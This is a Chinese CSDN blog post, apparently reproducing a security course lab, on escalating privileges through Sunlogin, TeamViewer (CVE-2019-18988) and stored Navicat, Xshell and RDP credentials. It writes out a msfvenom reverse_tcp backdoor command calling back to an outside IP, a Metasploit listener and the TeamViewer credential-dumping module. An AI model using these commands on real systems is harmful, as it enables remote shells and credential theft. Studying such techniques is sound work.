【权限提升】利用第三方应用Teamviewer&向日葵&Navivat-凭据

已于 2024-07-03 09:59:55 修改
阅读量804 收藏 3
点赞数 2
分类专栏: # 权限提升 文章标签: 运维 网络安全
于 2023-02-18 15:45:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53009585/article/details/129098656
版权
文章讲述了电脑或服务器上安装的第三方应用可能带来的安全隐患,特别是通过向日葵服务的漏洞进行权限提升。提权工具如CS被用于上传和执行后门,获取服务器的管理员权限。此外,TeamViewer的CVE-2019-18988漏洞也被提及作为提权手段。文章还讨论了密码提取工具对Xshell、Navicat和RDP等服务的密码获取,以及过时服务如FileZillaServ-u的安全问题。
摘要由CSDN通过智能技术生成
文章内容复现于小迪安全相关课程

电脑(服务器)装的第三方应用越多,安全隐患越大

远控类

利用向日葵漏洞提权 漏洞版本百度云链接

搭建:

为追求真实服务器环境,采用阿里云ECS弹性服务器搭建靶场(windows server2012 + phpstudy)

背景:

已有webshell权限,利用探针(查看端口,进程等)知道服务器安装了向日葵服务

tasklist /svc

提权工具-CS

上传后门,会连会话,这里由于搭建原因忽悠是administrator权限,当做是普通用户权限,且无法正常提权至系统权限

利用CS插件上传向日葵提权工具

上传

执行

机器密文就是验证码,使用Python高版本(大于3.8)执行解谜脚本Sunflower_get_Password-main进行解密。百度云链接

接下来可以使用向日葵远控软件直接连接靶机

teamviewer提权(CVE-2019-18988) 漏洞版本百度云链接

后门上线权限必须是管理员权限,低权限用户不能获取

使用msf模块获取id与密码

msfvenom -p windows/meterpreter/reverse_tcp LHOST=47.94.130.42 LPORT=3333 -f exe -o msf.exe   #生成后门
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 3333
run
run post/windows/gather/credentials/teamviewer_passwords

使用cs插件获取id与密码

密码类

各大浏览器 Xshell Navicat 3389 等

主要是使用cs插件直接进行提取,获取到相关密码

服务类

FileZilla Serv-u(漏洞太老了,已经淘汰了) Zend等

后续再补……

An0nymouer
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
直接建内网穿透服务器替换TeamViewer向日葵可以实现远程操控
m0_66327540的博客
01-18 1022
以前一直用的TeamViewer做服务器和自己电脑的远程管理,最近teamviewer被国内公司代理了,随之而来的是各种限制使用,我转而去使用国内另一个做远程控制的软件向日葵(之前也用过AnyDesk,但是服务器在国外太卡了),而随着向日葵用户的大量增多,免费用户的链接速度也是越来越慢,卡的不行。 偶然的机会看到网上一片文章:《一款带Web面板的轻量级、高性能内网穿透工具:nps使用教程》,刚好手头有一个闲置的阿里云服务器,可以利用云服务器做代理服务器就能实现内网服务器的远程访问。由于比较懒,下载了编译好
Teamviewer达到可使用设备数量上限:
热门推荐
kewendouhe的博客
01-12 1万+
Teamviewer达到可使用设备数量上限: 问题描述: Teamviewer官方限定了每个用户可以免费使用的设备数量上限为2台,如果账号被检测到在多于2台设备上使用后会被限制登录(只能在已经绑定的2台设备上登录) 解决方案: 其实最近Teamviewer给免费用户提供了很多方便,比如个人用户被检测为商业用户后可以在官方申诉,半个月左右可以收到申诉结果。 设备达到使用上限后也可以在官网解绑,具体步骤如下: 1. 首先使用个人账户从官网登陆,点击右上角个人中心的“编辑配置文件” 2. 在配置文件左边有
复现CVE-2022-10270(向日葵远程代码执行漏洞)
最新发布
cc123489ll的博客
05-21 326
引言漏洞描述影响版本:原理:环境搭建手动复现脚本复现修复建议。
向日葵RCE后续利用之本地提权
weixin_45794666的博客
02-27 1212
根据玄武实验室的文章 https://github.com/Ryze-T/CNVD-2022-10270-LPE 找到目标日志文件 cd /d c:/ dir /S sunlogin_service* 向日葵日志文件 sunlogin_service.20220226-171345.log 复现 安装.NET 4 https://www.microsoft.com/zh-cn/download/details.aspx?id=17718 在运行,发现需要指定路径路径,而我在win7下目录为 C:
向日葵远程命令执行漏洞(CNVD-2022-10270) 漏洞复现
Boom!脑洞大爆炸的博客
07-07 1585
向日葵远程命令执行漏洞(CNVD-2022-10270) 漏洞复现
CNVD-2022-03672/CNVD-2022-10270:向日葵简约版/向日葵个人版for Windows命令执行漏洞复现及修复建议
一只爱吃橙子的羊
03-31 7426
CNVD-2022-03672/CNVD-2022-10270:向日葵简约版/向日葵个人版for Windows命令执行漏洞复现及修复建议
复现向日葵远程代码执行漏洞
weixin_53440207的博客
02-27 1560
复现向日葵远程代码执行漏洞
向日葵RCE(CNVD-2022-10270/CNVD-2022-03672)
我了解豹女就像农民伯伯了解大米
03-19 1235
目录 漏洞描述: 工具复现: CS服务器上线:(失败) 漏洞描述: 上海贝锐信息科技股份有限公司的向日葵远控软件存在远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672),影响Windows系统使用的个人版和简约版,攻击者可利用该漏洞获取服务器控制权。 影响版本: 向日葵个人版 for Windows <= 11.0.0.33 向日葵简约版 <= V1.0.1.43315(2021.12) 工具复现: 同一局域网: 攻击机:172.5
TeamViewer 华为addon插件 QuickSupport QS Add-On: Huawei 11.0.5441
12-21
在企业环境中,尤其是IT技术支持领域,TeamViewer被广泛应用于远程解决问题、设备维护和协作。华为addon插件QuickSupport QS Add-On是TeamViewer针对华为设备定制的一个特别版本,旨在优化在华为设备上的使用体验。 ...
TeamViewer QuickSupport QS Add-On: Huawei 11.0.5441 华为 插件
01-31
TeamViewer 的安卓服务端QuickSupport 插件 QS Add-On: Huawei,国内网站几乎绝迹,可以安装,但实际与teamviewer配合使用效果未测。安装此APP之前必须先安装QuickSupport APP,这只是QS的一个插件,好象只适用于...
DecryptTeamViewer:从Windows注册表枚举和解密TeamViewer凭据
03-21
DecryptTeamViewer 使用CVE-2019-18988从Windows注册表枚举和解密TeamViewer凭据。 进行的漏洞研究。博客文章详细介绍了该漏洞: ://whynotsecurity.com/blog/teamviewer/ 用法 。\ DecryptTeamViewer.exe
TeamViewer QuickSupport QS Add-On: Huawei 华为手机TeamViewer 插件
10-19
TeamViewer QuickSupport QS Add-On: Huawei 华为手机TeamViewer 插件,仅适用华为手机
Teamviewer QuickSupport 插件 QS Add-On Huawei(安卓7.0版本可用)
02-18
TeamViewer QuickSupport是一款远程控制工具,专为用户提供即时的技术支持解决方案。这个插件QS Add-On Huawei是TeamViewer针对华为设备优化的一个特别版本,确保在运行Android 7.0操作系统的华为设备上能够顺利运行...
TeamViewer-id-changer.py.zip_teamviewer_tv python
09-21
同时,使用任何第三方脚本都存在安全风险,因为它可能要求用户提供登录凭据或其他敏感信息。在使用这样的脚本之前,用户应确保其来源可靠,并理解潜在的风险。 总结起来,"TeamViewer-id-changer.py.zip" 是一个...
服务攻防-应用协议-远控软件漏洞&向日葵&VNC&TV-平台漏洞&Kibana&Zabbix-附真实案例演示
ran的博客
05-11 2485
VNC (Virtual Network Computing) 是一种远程桌面协议,可以通过网络在远程计算机上查看和控制桌面。VNC是基于客户端-服务器模型的,客户端通过VNC协议与远程服务器建立连接,并在本地显示远程计算机的桌面内容。VNC协议支持多种操作系统和平台,包括Windows、Linux、MacOS和Android等。VNC协议使用了一系列TCP/IP端口,具体端口号取决于使用的VNC实现和配置方式。通常,VNC服务器使用的默认端口号是5900。
第100天:权限提升-数据库&Redis&Postgre&第三方软件&TV&向日葵&服务类
qq_46081990的博客
06-22 289
【代码】第100天:权限提升-数据库&Redis&Postgre&第三方软件&TV&向日葵&服务类。
Sunlogin_rce-main向日葵漏洞复现测试
m0_73615178的博客
02-17 485
版本。
Ubuntu-server 安装teamviewer
08-11
回答: 在Ubuntu Server上安装TeamViewer需要执行一系列的操作。首先,你需要删除TeamViewer的软件包和依赖项,可以使用以下命令来完成:123 #### 引用[.reference_title] - *1* *3* [ubuntu安装teamviewer后无法打开,提示权限不够](https://blog.csdn.net/NinoKazu/article/details/124725849)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* [Ubuntu server 安装 teamviewer 和使用 teamviewer](https://blog.csdn.net/u012743859/article/details/78282245)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值